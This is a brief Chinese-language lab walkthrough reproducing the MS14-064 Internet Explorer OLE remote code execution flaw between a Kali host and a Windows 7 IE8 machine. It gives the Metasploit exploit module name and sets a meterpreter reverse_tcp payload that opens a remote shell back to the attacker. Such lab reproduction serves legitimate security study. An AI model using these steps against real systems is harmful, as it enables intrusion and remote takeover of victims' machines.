漏洞介绍:MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution,主要利用IE浏览器漏洞,Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,用户使用Internet Explorer浏览器查看该网站的时允许远程执行代码
受影响产品:Windows server 2003,Windows Vista,Windows server 2008,Windows server 2008 R2,Windows 7,Windows xp,Windows 8,Windows 8.1,Windows Server 2012,Windows server 2012 R2,Windows RT,Windows RT 8.1
复现过程:kali【192.168.198.129 】+win7【IE8】【192.168.198.130】
1、启动MSF,搜索ms14-064漏洞信息
利用第一个攻击模块:use exploit/windows/browser/ms14_064_ole_code_execution
show payloads:查看有效攻击载荷
设置反弹shell:set payload windows/meterpreter/reverse_tcp
show options:查看需要设置的地方
对需要设置的地方设置
这时用win7访问网站即可命令执行